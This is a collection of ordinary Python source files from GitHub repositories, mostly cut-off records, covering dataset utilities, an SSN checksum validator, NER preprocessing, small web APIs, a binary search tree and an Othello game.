\t\t\t\tslice1 = {mode: dataset1}\n# \t\telse:\n# \t\t\tslice1 = None\n# \t\tif dataset2 is None:\n# \t\t\tdataset2 = A.pull('dataset2')\n# \t\t\tif type(dataset2) == dict:\n# \t\t\t\tslice2 = dataset2\n# \t\t\t\tdataset2 = dataset2[mode]\n# \t\t\telse:\n# \t\t\t\tslice2 = {mode: dataset2}\n# \t\telse:\n# \t\t\tslice2 = None\n#\n# \t\tif sel_one is None:\n# \t\t\tsel_one = A.pull('sel-first', True)\n#\n# \t\tsuper().__init__(dataset1.din, dataset2.din)\n#\n# \t\tself.mode = mode\n# \t\tself._slice1, self._slice2 = slice1, slice2\n#\n# \t\tself.din1, self.dout1 = dataset1.din, dataset1.dout\n# \t\tself.din2, self.dout2 = dataset2.din, dataset2.dout\n#\n# \t\tself.dataset1 = dataset1\n# \t\tself.dataset2 = dataset2\n#\n# \t\tself.select_first = sel_one\n#\n# \tdef __len__(self):\n# \t\treturn len(self.dataset1) * len(self.dataset2)\n#\n# \tdef __getitem__(self, item):\n#\n# \t\tidx1 = item // len(self.dataset2)\n# \t\tidx2 = item % len(self.dataset2)\n#\n# \t\tb1 = self.dataset1[idx1]\n# \t\tb2 = self.dataset2[idx2]\n#\n# \t\tif self.select_first and isinstance(b1, (list, tuple)):\n# \t\t\tb1 = b1[0]\n# \t\t\tb2 = b2[0]\n#\n# \t\treturn (b1, b2)\n#\n# \tdef split(self, A):\n#\n# \t\tsplits = {}\n#\n# \t\tcls = self.__class__\n#\n# \t\tfor key in self._slice1.keys():\n# \t\t\tif key == self.mode:\n# \t\t\t\tsplits[key] = self\n# \t\t\telif self._slice1[key] is not None and self._slice2[key] is not None:\n# \t\t\t\tA.push('mode', key, silent=True)\n# \t\t\t\tsplits[key] = cls(A, dataset1=self._slice1[key], dataset2=self._slice2[key])\n#\n# \t\treturn splits\n","repo_name":"felixludos/omni-learn","sub_path":"omnilearn/old/op/datasets/translation.py","file_name":"translation.py","file_ext":"py","file_size_in_byte":3440,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"14250787078","text":"# Asks the user for their social security number and splits it into 4 variables yyyy, mm, dd, xxxx.\nyyyy_mm_dd_xxxx = input(\"Skriv ditt personnummer (yyyy-mm-dd-xxxx):\")\nchunks = yyyy_mm_dd_xxxx.split('-')\n\n# - Predetermines the boolean of \"validity\" as False, later in the code we will see the different ways valid can be turned into True.\nvalidity = False\n\n\n# Puts the previous splits together and splits it again letter by letter.\nyyyymmddxxxx = chunks[0] + chunks[1] + chunks[2] + chunks[3]\ndef splitword(word):\n return [char for char in word]\n\n\n\n# Calculates the first part of the social security number algorithm.\namountlist = list((int(yyyymmddxxxx[2]) * 2, int(yyyymmddxxxx[3]), int(yyyymmddxxxx[4]) * 2, int(yyyymmddxxxx[5]), int(yyyymmddxxxx[6]) * 2, int(yyyymmddxxxx[7]), int(yyyymmddxxxx[8]) * 2, int(yyyymmddxxxx[9]), int(yyyymmddxxxx[10]) * 2))\n\n# Calculates the second part of the social security number algorithm.\n# - Predetermines the value of \"x\" to = 0.\nx = 0\n# - Iterates all elements in amountlist and separates any numbers with two digits, otherwise they are left as they are. It then adds them together into variable \"x\".\nfor i in amountlist:\n if len(str(i)) == 2:\n split_dual_number = splitword(str(i))\n for i in split_dual_number:\n x = x + int(i)\n else:\n x = x + i\n\n# - X is now the added number of all individual digits inside amountlist and by doing the below we split the number we get into two.\nsplit_final_number = (splitword(str(x)))\n\n# - Definition which finalizes whether or not your social security number is valid or not and then changes the boolean of \"validity\" as a consequence.\ndef validity_checker():\n if (int(split_final_number[1])) == int(yyyymmddxxxx[11]) and (int(split_final_number[1])) == 0:\n global validity\n validity = True\n else:\n friend_of_10 = 10 - (int(split_final_number[1]))\n if friend_of_10 == int(yyyymmddxxxx[11]):\n validity = True\n else:\n pass\n\nvalidity_checker()\n\nprint(validity)","repo_name":"Tivamishae/Duran_Project","sub_path":"Test_parts/Part 2: SSN checker algorithm.py","file_name":"Part 2: SSN checker algorithm.py","file_ext":"py","file_size_in_byte":2043,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"73917083626","text":"import re\nimport string\nfrom tqdm import tqdm\nimport json\nimport pandas as pd\nfrom collections import defaultdict\nfrom gensim.models import KeyedVectors\nimport gensim\nfrom torch.utils.data import Dataset, DataLoader, WeightedRandomSampler\nimport torch\nimport torch.nn as nn\nfrom collections import Counter\nfrom multiprocessing import Pool\nimport math\nimport gc\nimport gzip\nimport wordninja\n\ndef read_json(file_path):\n with open(file_path, 'r', encoding='utf-8') as f:\n file = json.load(f)\n return file\n\ndef write_json(json_file, file_path):\n with open(file_path, 'w', encoding='utf-8') as f:\n json.dump(json_file, f)\n\n\nclass SplitJoinWords():\n def __init__(self, data_path):\n with open(data_path, 'r', encoding='utf-8') as f:\n self.corpus = f.read()\n self.dictionary = self.build_freq_stats()\n self.segmenter = wordninja.LanguageModel('conf/freq_stats.txt.gz')\n\n def words(self, text): \n return re.findall('[a-zA-Z]+', text)\n \n def build_freq_stats(self):\n freq_stats = Counter(self.words(self.corpus))\n sorted_keys = sorted(freq_stats, key=lambda k: freq_stats[k], reverse=True)\n with gzip.open('conf/freq_stats.txt.gz', 'wt', encoding='utf-8') as f:\n for word in sorted_keys:\n f.write(word+'\\n')\n return set(sorted_keys)\n\n def split(self, word):\n return self.segmenter.split(word)\n\nclass Tokenizer():\n def __init__(self, segmenter=None):\n self.segmenter = segmenter\n self.pattern = re.compile(r'[\\n\\r\\t]|(\\d)|[\\!\\\"\\#\\$\\%\\&\\\\\\'\\(\\)\\*\\+\\/\\:\\;\\<\\=\\>\\?\\@\\[\\\\\\\\\\]\\^\\`\\{\\|\\}\\~\\,\\。\\?\\!\\:\\、\\《\\》\\ ]|([\\-\\_\\,\\.])')\n\n def contains_arabic(self, text):\n pattern = r'[\\u0600-\\u06FF]+' # 匹配阿拉伯文的正则表达式\n matches = re.search(pattern, text)\n if matches:\n return True\n return False\n \n def viterbi_tokenize(self, sentence):\n token_list = []\n tokens = re.split(self.pattern, sentence)\n for token in tokens:\n if token and token not in '\\-\\_' and not self.contains_arabic(token):\n token_list.extend(self.segmenter.split(token))\n elif token and (token in '\\-\\_' or self.contains_arabic(token)):\n token_list.append(token)\n return token_list\n \n def tokenize(self, sentence):\n token_list = []\n tokens = re.split(self.pattern, sentence)\n for token in tokens:\n if token:\n token_list.append(token)\n return token_list\n\n\ndef build_data(data_path, output_path, with_label=True):\n '''\n 清洗、分词数据集\n '''\n if with_label:\n label_list = []\n text_list = []\n with open(data_path,'r',encoding='utf-8') as f:\n texts = []\n labels = []\n text_list = []\n label_list = []\n for line in tqdm(f):\n if line != '\\n':\n line_list = line.strip('\\n').split('\\t')\n text_list.append(line_list[0])\n label_list.append(line_list[1])\n else:\n texts.append(text_list)\n labels.append(label_list)\n text_list = []\n label_list = []\n with open(output_path,'w') as f:\n for text, label in tqdm(zip(texts, labels)):\n json.dump({\"text\":text,\"label\":label},f)\n f.write('\\n')\n else:\n text_list = []\n with open(data_path,'r',encoding='utf-8') as f:\n texts = []\n text_list = []\n for line in tqdm(f):\n if line != '\\n':\n text_list.append(line.strip('\\n'))\n else:\n texts.append(text_list)\n text_list = []\n with open(output_path,'w') as f:\n for text in tqdm(texts):\n json.dump({\"text\":text},f)\n f.write('\\n')\n\n\ndef build_train_val_test(train_data_path, \n val_data_path, \n test_data_path, \n train_build_path, \n val_build_path, \n test_build_path):\n '''\n 清洗训练集、验证集、测试集 \n '''\n print('清洗数据中...')\n build_data(train_data_path, train_build_path)\n build_data(val_data_path, val_build_path)\n build_data(test_data_path, test_build_path)\n \ndef read_json(file_path):\n with open(file_path, 'r', encoding='utf-8') as f:\n file = json.load(f)\n return file\n\ndef write_json(json_file, file_path):\n with open(file_path, 'w', encoding='utf-8') as f:\n json.dump(json_file, f)\n\n\ndef build_word2id_char2id_tag2id(data_path, \n case=True, \n pretrain_vector_path=None, \n max_word2id_size=None, \n max_char2id_size=None, \n min_word_freq=1, \n min_char_freq=1):\n '''\n case: 区分大小写, 默认为不区分\n pretrain_vector: 预训练词向量的path, 以便生成word2vec中词汇的word2id\n max_word2id_size: 最大词表大小\n max_char2id_size: 最大字符表大小\n min_word_freq: 最小词频\n min_char_freq: 最小字符频\n '''\n # 生成 word2id\n word_freq = defaultdict(int)\n char_freq = defaultdict(int)\n word2id = {}\n tag2id = {}\n char2id = {}\n if not pretrain_vector_path:\n with open(data_path, 'r', encoding='utf-8') as f:\n for line in tqdm(f):\n sentence = json.loads(line)\n text = sentence['text']\n tags = sentence['label']\n for word, tag in zip(text, tags):\n if tag not in tag2id:\n tag2id[tag] = len(tag2id)\n if case:\n word_freq[word] += 1\n else:\n word_freq[word.lower()] += 1\n for char in word:\n if case:\n char_freq[char] += 1\n else:\n char_freq[char.lower()] += 1\n vocab_list = [(word, freq) for word, freq in word_freq.items() if freq >= min_word_freq]\n vocab_list.sort(key=lambda x: x[1], reverse=True)\n char_list = [(char, freq) for char, freq in char_freq.items() if freq >= min_char_freq]\n if max_word2id_size:\n vocab_list = vocab_list[:max_word2id_size]\n if max_char2id_size:\n char_list = char_list[:max_char2id_size]\n word2id = {'': 0, '': 1}\n char2id = {'': 0, '': 1}\n word2id.update({word_count[0]: idx+2 for idx, word_count in enumerate(vocab_list)})\n char2id.update({char_count[0]: idx+2 for idx, char_count in enumerate(char_list)})\n else:\n model = KeyedVectors.load_word2vec_format(pretrain_vector_path, binary=False)\n word2id = {'': 0, '': 1}\n if tuple(map(int, gensim.__version__.split('.'))) > (4,0,0):\n vocab = model.key_to_index\n else:\n vocab = model.wv.vocab\n for idx,i in enumerate(list(vocab)):\n word2id[i] = idx + 2\n with open(data_path,'r') as f:\n for line in f:\n sentence = json.loads(line)\n tags = sentence['label']\n text = text = sentence['text']\n for word, tag in zip(text, tags):\n if tag not in tag2id:\n tag2id[tag] = len(tag2id)\n for char in word:\n if case:\n char_freq[char] += 1\n else:\n char_freq[char.lower()] += 1\n char_list = [(char, freq) for char, freq in char_freq.items() if freq >= min_char_freq]\n if max_char2id_size:\n char_list = char_list[:max_char2id_size]\n char2id = {'': 0, '': 1} \n char2id.update({char_count[0]: idx+2 for idx, char_count in enumerate(char_list)})\n\n id2word = {v:k for k,v in word2id.items()}\n id2tag = {v:k for k,v in tag2id.items()}\n id2char = {v:k for k,v in char2id.items()}\n\n write_json(word2id, './conf/word2id.json')\n write_json(char2id, './conf/char2id.json')\n write_json(tag2id, './conf/tag2id.json')\n write_json(id2word, './conf/id2word.json')\n write_json(id2tag, './conf/id2tag.json')\n write_json(id2char, './conf/id2char.json')\n \n return word2id, char2id, tag2id\n\ndef filter_word2vec(word2id, output_path, word2vec_path):\n '''\n 词向量筛选 \n '''\n print('加载词向量...')\n model = KeyedVectors.load_word2vec_format(word2vec_path, binary=False)\n # 创建新的词向量字典,用于存储筛选后的词汇和对应的词向量\n filtered_word2vec = {}\n # 遍历词汇表,如果词汇在预训练词向量模型中存在,则将其添加到新的词向量字典中\n print('筛选词向量...')\n if tuple(map(int, gensim.__version__.split('.'))) > (4,0,0):\n vocab = model.key_to_index\n else:\n vocab = model.wv.vocab\n for word in tqdm(vocab):\n if word in word2id:\n filtered_word2vec[word] = model[word]\n \n # 将筛选后的词向量写入到新的文本文件中\n with open(output_path, 'w', encoding='utf-8') as f:\n for word, vector in filtered_word2vec.items():\n vector_str = ' '.join(str(val) for val in vector)\n line = f\"{word} {vector_str}\\n\"\n f.write(line)\n \n # 向量化后的维度\n with open(output_path, 'r',encoding='utf-8') as f:\n line = f.readline().split(' ')\n\n vector_size = len(line) - 1\n\n # 筛选后的词表大小\n with open(output_path, 'r',encoding='utf-8') as f:\n lines = f.readlines()\n vocab_size = len(lines)\n\n # 将词表大小和维度数添加到文件头部\n with open(output_path, 'r+',encoding='utf-8') as f:\n content = f.read()\n f.seek(0, 0)\n f.write(('%d %d\\n' % (vocab_size, vector_size)) + content)\n\n print(f\"Filtered word vectors saved to '{output_path}'.\")\n\n\nclass MyDataset(Dataset):\n def __init__(self, data_path, word2id, tag2id, char2id, max_sentence_length=64, max_word_length=20, with_label=True):\n self.with_label = with_label\n self.word2id = word2id\n self.char2id = char2id\n self.texts = []\n self.data_path = data_path\n self.max_word_length = max_word_length\n if self.with_label:\n self.tag2id = tag2id\n self.labels = []\n with open(data_path,'r') as f:\n for line in f:\n sentence = json.loads(line)\n self.texts.append(sentence['text'])\n self.labels.append(sentence['label'])\n else:\n with open(data_path,'r') as f:\n for line in f:\n sentence = json.loads(line)\n self.texts.append(sentence['text'])\n # mask\n self.mask = []\n for sentence in self.texts:\n mask = [1] * len(sentence)\n self.mask.append(mask)\n\n if self.with_label:\n for i in range(len(self.texts)):\n length = len(self.texts[i])\n if length < max_sentence_length:\n pad_length = max_sentence_length - length\n self.texts[i].extend([''] * pad_length)\n self.labels[i].extend(['O'] * pad_length)\n self.mask[i].extend([0] * pad_length)\n else:\n self.texts[i] = self.texts[i][:max_sentence_length]\n self.labels[i] = self.labels[i][:max_sentence_length]\n self.mask[i] = self.mask[i][:max_sentence_length]\n else:\n for i in range(len(self.texts)):\n length = len(self.texts[i])\n if length < max_sentence_length:\n pad_length = max_sentence_length - length\n self.texts[i].extend([''] * pad_length)\n self.mask[i].extend([0] * pad_length)\n else:\n self.texts[i] = self.texts[i][:max_sentence_length]\n self.mask[i] = self.mask[i][:max_sentence_length]\n\n def __len__(self):\n return len(self.texts)\n\n def __getitem__(self, idx):\n if self.with_label:\n label = self.labels[idx]\n label_to_id = []\n sentence = self.texts[idx]\n mask = self.mask[idx]\n sentence_to_id = []\n char_to_id = []\n if self.with_label:\n for word, tag, m in zip(sentence, label, mask):\n if word in self.word2id:\n sentence_to_id.append(self.word2id[word])\n else:\n sentence_to_id.append(self.word2id[''])\n word_length = len(word)\n word_to_char_to_idx = []\n if len(word) <= self.max_word_length:\n chars_list = [char for char in word] + [''] * (self.max_word_length - word_length)\n for char in chars_list:\n char_id = self.char2id.get(char, self.char2id[''])\n word_to_char_to_idx.append(char_id)\n else:\n chars_list = [char for char in word[:self.max_word_length]]\n for char in chars_list:\n char_id = self.char2id.get(char, self.char2id[''])\n word_to_char_to_idx.append(char_id)\n char_to_id.append(word_to_char_to_idx)\n label_to_id.append(self.tag2id[tag])\n return torch.LongTensor(sentence_to_id), torch.LongTensor(char_to_id), torch.LongTensor(label_to_id), torch.tensor(mask).bool()\n else:\n for word, m in zip(sentence, mask):\n if word in self.word2id:\n sentence_to_id.append(self.word2id[word])\n else:\n sentence_to_id.append(self.word2id[''])\n word_length = len(word)\n word_to_char_to_idx = []\n if len(word) <= self.max_word_length:\n chars_list = [char for char in word] + [''] * (self.max_word_length - word_length)\n for char in chars_list:\n char_id = self.char2id.get(char, self.char2id[''])\n word_to_char_to_idx.append(char_id)\n else:\n chars_list = [char for char in word[:self.max_word_length]]\n for char in chars_list:\n char_id = self.char2id.get(char, self.char2id[''])\n word_to_char_to_idx.append(char_id)\n char_to_id.append(word_to_char_to_idx)\n return torch.LongTensor(sentence_to_id), torch.LongTensor(char_to_id), torch.tensor(mask).bool()\n\n\n\ndef init_network(model, method='xavier', exclude='embedding', seed=42):\n '''\n 权重初始化\n method: xavier, kaiming (默认xavier)\n '''\n for name, w in model.named_parameters():\n if exclude not in name:\n if 'weight' in name:\n if method == 'xavier':\n nn.init.xavier_normal_(w)\n elif method == 'kaiming':\n nn.init.kaiming_normal_(w)\n else:\n nn.init.normal_(w)\n elif 'bias' in name:\n nn.init.constant_(w, 0)\n else:\n pass\n\n","repo_name":"ponymhc/BiLSTM_CNN_CRF","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":15750,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"31940568615","text":"import json\nimport pandas as pd\nimport sys\nfrom flask import Blueprint\nfrom flask import current_app as app\nfrom flask import request\nfrom flask import jsonify\nfrom scipy import stats\nfrom utillities.exceptions import ExceptionHelpers\nfrom sklearn.naive_bayes import GaussianNB\n\n\nmod = Blueprint('stats', __name__)\nnull = None\n@mod.route('z_score/', methods=[\"POST\"])\ndef z_score():\n try:\n request_dict = request.get_json()\n jsonstr = request_dict['jsonStr']\n columns = request_dict['columns']\n df = pd.read_json(json.dumps(eval(jsonstr)), orient='split')\n if(columns is None):\n z_values = pd.np.abs(stats.zscore(df))\n z_values = pd.np.transpose(z_values)\n result = dict(zip(df.columns.values.tolist(), z_values.tolist())) \n else:\n z_values = pd.np.abs(stats.zscore(df[columns]))\n z_values = pd.np.transpose(z_values)\n result = dict(zip(columns, z_values.tolist()))\n print(result)\n response = app.response_class(\n response=json.dumps(result),\n status=200,\n mimetype='application/json'\n )\n except:\n exception = ExceptionHelpers.format_exception(sys.exc_info())\n response = app.response_class(\n response=exception,\n status=400,\n mimetype='application/json'\n )\n return response\n\n@mod.route('drop_outliers/', methods=[\"POST\"])\ndef drop_outliers():\n try:\n request_dict = request.get_json()\n jsonstr = request_dict['jsonStr']\n z_values = request_dict['z_values']\n standard_deviation = request_dict['standard_deviation']\n keys = list(z_values.keys())\n vals = [z_values[x] for x in keys]\n transpose_vals = pd.np.transpose(vals).tolist()\n \n bools = []\n for i in transpose_vals:\n b = all(item < standard_deviation for item in i)\n bools.append(b)\n df = pd.read_json(json.dumps(eval(jsonstr)), orient='split')\n filtered_df = df[bools]\n df_json = filtered_df.to_json(orient='split', date_format='iso')\n response = app.response_class(\n response=df_json,\n status=200,\n mimetype='application/json'\n )\n except:\n exception = ExceptionHelpers.format_exception(sys.exc_info())\n response = app.response_class(\n response=exception,\n status=400,\n mimetype='application/json'\n )\n return response\n\n@mod.route('naive_bayes/', methods=[\"POST\"])\ndef naive_bayes():\n try:\n request_dict = request.get_json()\n traning_features = request_dict['traning_features']\n traning_targets = request_dict['traning_targets']\n test_features = request_dict['test_features']\n\n from sklearn.preprocessing import StandardScaler\n sc = StandardScaler()\n X_train = sc.fit_transform(pd.np.array(traning_features))\n X_test = sc.transform(pd.np.array(test_features))\n\n # Fitting Naive Bayes to the Training set\n from sklearn.naive_bayes import GaussianNB\n classifier = GaussianNB()\n classifier.fit(X_train, traning_targets)\n\n # Predicting the Test set results\n y_pred = classifier.predict(X_test)\n json_response = json.dumps(y_pred.tolist())\n response = app.response_class(\n response=json_response,\n status=200,\n mimetype='application/json'\n )\n except:\n exception = ExceptionHelpers.format_exception(sys.exc_info())\n print(exception)\n response = app.response_class(\n response=exception,\n status=400,\n mimetype='application/json'\n )\n print(exception)\n return response ","repo_name":"SHKnudsen/Pandamo","sub_path":"src/Python/pandasDynamo/pandamo/api/statistics/stats.py","file_name":"stats.py","file_ext":"py","file_size_in_byte":3794,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"37"} +{"seq_id":"30208555555","text":"from aiohttp_apispec.aiohttp_apispec import setup_aiohttp_apispec\nimport logging\nfrom typing import Callable, AsyncGenerator\nfrom aiohttp import web\nfrom aiohttp.web_middlewares import normalize_path_middleware\nfrom aiohttp_session import session_middleware\nfrom aiohttp_session.cookie_storage import EncryptedCookieStorage\n\nfrom config import Config, DatabaseConfig\nfrom api.handlers import routes\nfrom dl.repository import Repository\n\n\ndef cleanup_database(\n config: DatabaseConfig\n) -> Callable[[web.Application], AsyncGenerator]:\n async def cleanup(app: web.Application) -> AsyncGenerator:\n async with Repository(config) as repository:\n app['repository'] = repository\n yield\n return cleanup\n\n\ndef get_app(config: Config) -> web.Application:\n app = web.Application(\n middlewares=[\n normalize_path_middleware(),\n session_middleware(EncryptedCookieStorage(\n b'Thirty two length bytes key.')\n )\n ],\n )\n logging.basicConfig(level=logging.DEBUG)\n setup_aiohttp_apispec(\n app=app,\n title=\"coordinate_project\",\n url=\"/api/docs/swagger.json\",\n swagger_path=\"/api/docs\",\n )\n app.cleanup_ctx.append(cleanup_database(config.db))\n app['secret_table'] = config.app.secret_table\n app.add_routes(routes)\n return app\n","repo_name":"carolinepi/coarsening-of-coordinates","sub_path":"api/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1363,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"14071277837","text":"class BST:\n def __init__(self, data=None):\n self.left = None\n self.right = None\n self.data = data\n\n def insert(self, data):\n if not self.data:\n self.data = data\n return\n\n if self.data == data:\n return\n\n if data < self.data:\n if self.left:\n self.left.insert(data)\n return\n self.left = BST(data)\n return\n\n if self.right:\n self.right.insert(data)\n return\n self.right = BST(data)\n\n def get_min(self):\n current = self\n while current.left is not None:\n current = current.left\n return current.data\n\n def get_max(self):\n current = self\n while current.right is not None:\n current = current.right\n return current.data\n\n def preorder(self, datas):\n if self.data is not None:\n datas.append(self.data)\n if self.left is not None:\n self.left.preorder(datas)\n if self.right is not None:\n self.right.preorder(datas)\n return datas\n\n def inorder(self, datas):\n if self.left is not None:\n self.left.inorder(datas)\n if self.data is not None:\n datas.append(self.data)\n if self.right is not None:\n self.right.inorder(datas)\n return datas\n\n def postorder(self, datas):\n if self.left is not None:\n self.left.postorder(datas)\n if self.right is not None:\n self.right.postorder(datas)\n if self.data is not None:\n datas.append(self.data)\n return datas\n","repo_name":"goatcheese82/python_structures","sub_path":"examples/tree_solution.py","file_name":"tree_solution.py","file_ext":"py","file_size_in_byte":1665,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"19036544556","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Nov 18 09:32:29 2019\n\n@author: Gary\n\"\"\"\nimport pandas as pd\n\ndef add_Elsner_table(df,sources='./sources/',\n outdir='./out/',\n ehfn='elsner_corrected_table.csv'):\n #print('Adding Elsner/Hoelzer table to CAS table')\n ehdf = pd.read_csv(sources+ehfn,quotechar='$')\n # checking overlap first:\n ehcas = list(ehdf.eh_CAS.unique())\n dfcas = list(df.bgCAS.unique())\n with open(outdir+'elsner_non_overlap.txt','w') as f:\n f.write('**** bgCAS numbers without an Elsner entry: *****\\n')\n for c in dfcas:\n if c not in ehcas:\n f.write(f'{c}\\n')\n f.write('\\n\\n***** Elsner CAS numbers without a FF entry: *****\\n')\n for c in ehcas:\n if c not in dfcas:\n f.write(f'{c}\\n')\n\n mg = pd.merge(df,ehdf,left_on='bgCAS',right_on='eh_CAS',\n how='left',validate='1:1')\n return mg\n\ndef add_WellExplorer_table(df,sources='./sources/',\n outdir='./out/',\n wefn='well_explorer_corrected.csv'):\n \"\"\"Add the WellExplorer data table. \"\"\"\n #print('Adding WellExplorer table to CAS table')\n wedf = pd.read_csv(sources+wefn)\n #print(wedf.head())\n # checking overlap first:\n wecas = list(wedf.we_CASNumber.unique())\n dfcas = list(df.bgCAS.unique())\n with open(outdir+'wellexplorer_non_overlap.txt','w') as f:\n f.write('**** bgCAS numbers without an WellExplorer entry: *****\\n')\n for c in dfcas:\n if c not in wecas:\n f.write(f'{c}\\n')\n f.write('\\n\\n***** WellExplorer CAS numbers without a FF entry: *****\\n')\n for c in wecas:\n if c not in dfcas:\n f.write(f'{c}\\n')\n\n mg = pd.merge(df,wedf,left_on='bgCAS',right_on='we_CASNumber',\n how='left',validate='1:1')\n return mg\n\n \ndef add_TEDX_ref(df,sources='./sources/',\n tedx_fn = 'TEDX_EDC_trimmed.xls'):\n #print('Adding TEDX link to CAS table')\n tedxdf = pd.read_excel(sources+tedx_fn)\n tedx_cas = tedxdf.CAS_Num.unique().tolist()\n df['is_on_TEDX'] = df.bgCAS.isin(tedx_cas)\n return df\n \ndef add_TSCA_ref(df,sources='./sources/',\n tsca_fn = 'TSCAINV_092019.csv'):\n #print('Adding TSCA to CAS table')\n tscadf = pd.read_csv(sources+tsca_fn)\n tsca_cas = tscadf.CASRN.unique().tolist()\n df['is_on_TSCA'] = df.bgCAS.isin(tsca_cas)\n return df\n \ndef add_Prop65_ref(df,sources='./sources/',\n p65_fn = 'p65list12182020.csv'):\n #print('Adding California Prop 65 to CAS table')\n p65df = pd.read_csv(sources+p65_fn,encoding='iso-8859-1')\n p65_cas = p65df['CAS No.'].unique().tolist()\n df['is_on_prop65'] = df.bgCAS.isin(p65_cas)\n return df\n \ndef add_CWA_SDWA_ref(df,sources='./sources/',\n cwa_fn = 'sara_sdwa_cwa.csv'):\n #print('Adding SDWA/CWA lists to CAS table')\n cwadf = pd.read_csv(sources+cwa_fn)\n cwa_cas = cwadf['CASNo'].unique().tolist()\n df['is_on_CWA_SDWA'] = df.bgCAS.isin(cwa_cas)\n return df\n \ndef add_all_bgCAS_tables(df,sources='./sources/external_refs/',\n outdir='./outdir/'):\n df = add_CWA_SDWA_ref(df,sources)\n df = add_Prop65_ref(df,sources)\n df = add_TSCA_ref(df,sources)\n df = add_TEDX_ref(df,sources)\n df = add_WellExplorer_table(df,sources,outdir)\n df = add_Elsner_table(df,sources,outdir)\n return df\n ","repo_name":"gwallison/openFF2","sub_path":"core/external_dataset_tools.py","file_name":"external_dataset_tools.py","file_ext":"py","file_size_in_byte":3485,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"42179198132","text":"#!/usr/bin/python3\n\n\n\"\"\"\nA module that provides a function that multiplies two matrix.\n\"\"\"\n\n\ndef matrix_mul(m_a, m_b):\n \"\"\"\n The function multiplies 2 matrix (list of lists)\n and raises exception if there is any form of\n impossibilities in multiplying\n \"\"\"\n if type(m_a) != list:\n raise TypeError(\"m_a must be a list\")\n if type(m_b) != list:\n raise TypeError(\"m_b must be a list\")\n\n result = []\n len_a = len(m_a[0]) if len(m_a) and type(m_a[0]) == list else 0\n len_b = len(m_b[0]) if len(m_b) and type(m_b[0]) == list else 0\n\n for ma in m_a:\n if type(ma) != list:\n raise TypeError(\"m_a must be a list of lists\")\n if len(ma) != len_a:\n raise TypeError(\"each row of m_a must be of the same size\")\n for a in ma:\n if type(a) not in (int, float):\n raise TypeError(\"m_a should contain only integers or floats\")\n for mb in m_b:\n if type(mb) != list:\n raise TypeError(\"m_b must be a list of lists\")\n if len(mb) != len_b:\n raise TypeError(\"each row of m_b must be of the same size\")\n for b in mb:\n if type(b) not in (int, float):\n raise TypeError(\"m_b should contain only integers or floats\")\n\n if len(m_a) == 0 or (len(m_a) == 1 and len(m_a[0]) == 0):\n raise ValueError(\"m_a can't be empty\")\n if len(m_b) == 0 or (len(m_b) == 1 and len(m_b[0]) == 0):\n raise ValueError(\"m_b can't be empty\")\n\n for idx in range(len(m_a)):\n new_arr = []\n row = m_a[idx]\n for i in range(len_b):\n points = 0\n for j in range(len(row)):\n try:\n points += row[j] * m_b[j][i]\n except IndexError:\n raise ValueError(\"m_a and m_b \\\ncan't be multiplied\") from None\n new_arr.append(points)\n result.append(new_arr)\n if len_a != len(m_b):\n raise ValueError(\"m_a and m_b can't be multiplied\")\n return result\n","repo_name":"shady-cj/alx-higher_level_programming","sub_path":"0x07-python-test_driven_development/100-matrix_mul.py","file_name":"100-matrix_mul.py","file_ext":"py","file_size_in_byte":2019,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"24017087531","text":"from typing import Optional\nfrom fastapi import FastAPI\nfrom pydantic import BaseModel\n\n\nclass Item(BaseModel):\n name: str\n description: Optional[str] = None\n price: float\n tax: Optional[float] = None\n\n\napp = FastAPI()\n\n\n@app.post(\"/items/{item_id}\")\nasync def create_item(item_id: int, item: Item, query: int):\n item.name = item.name.capitalize()\n item_dict = {\"item_id\": item_id, **item.dict()}\n item_dict.update({\"query\": query})\n if item.tax:\n price_with_tax = item.price + item.tax\n item_dict.update({\"price_with_tax\": price_with_tax})\n print(\"item: \", item_dict)\n return item_dict\n\n\n@app.get(\"/req_body_items/{user_id}/{item_id}\")\nasync def req_body_get_item(user_id: int, item_id: int):\n return {\"user_id\": user_id, \"item_id\": item_id}\n","repo_name":"lukasz-segin/fast_api_first_tutorial","sub_path":"request_body.py","file_name":"request_body.py","file_ext":"py","file_size_in_byte":790,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"24160082557","text":"from abc import ABC, abstractmethod\nfrom typing import List\n\nfrom .MessageSourceResolvable import MessageSourceResolvable\nfrom springframework.utils.mock.inst import Locale\n\n\nclass MessageSource(ABC):\n @abstractmethod\n def get_message(\n self,\n locale: Locale,\n default_message: str = None,\n resolvable: MessageSourceResolvable = None,\n code: str = None,\n args: List[object] = None,\n ):\n raise NotImplementedError\n","repo_name":"j40903272/spring-webmvc-python","sub_path":"springframework/context/MessageSource.py","file_name":"MessageSource.py","file_ext":"py","file_size_in_byte":471,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"38083780724","text":"import time\nimport numpy as np\n\n# The size of board\nSIZE = 8\n# The start condition\nSTART_BOARD = np.zeros((SIZE, SIZE), dtype=int)\nSTART_BOARD[SIZE//2, SIZE//2], START_BOARD[SIZE//2-1, SIZE//2-1] = 1, 1\nSTART_BOARD[SIZE//2-1, SIZE//2], START_BOARD[SIZE//2, SIZE//2-1] = -1, -1\n# The maximum serch depth of Min-Max method\nDEPTH = 3\n\n\nclass Game:\n # First player: -1, Second player: 1\n def __init__(self, b, first_eb, second_eb):\n self.board = b\n self.eboards = (first_eb, np.nan, second_eb)\n \n \n # Copy this class itself\n def copy(self):\n return Game(self.board.copy(), self.eboards[0], self.eboards[2])\n \n \n # Count the number of player's stones.\n def count_stones(self, player):\n return np.sum(self.board == player)\n \n \n # Find the positions where the player can put a stone.\n # arg: player\n # return: 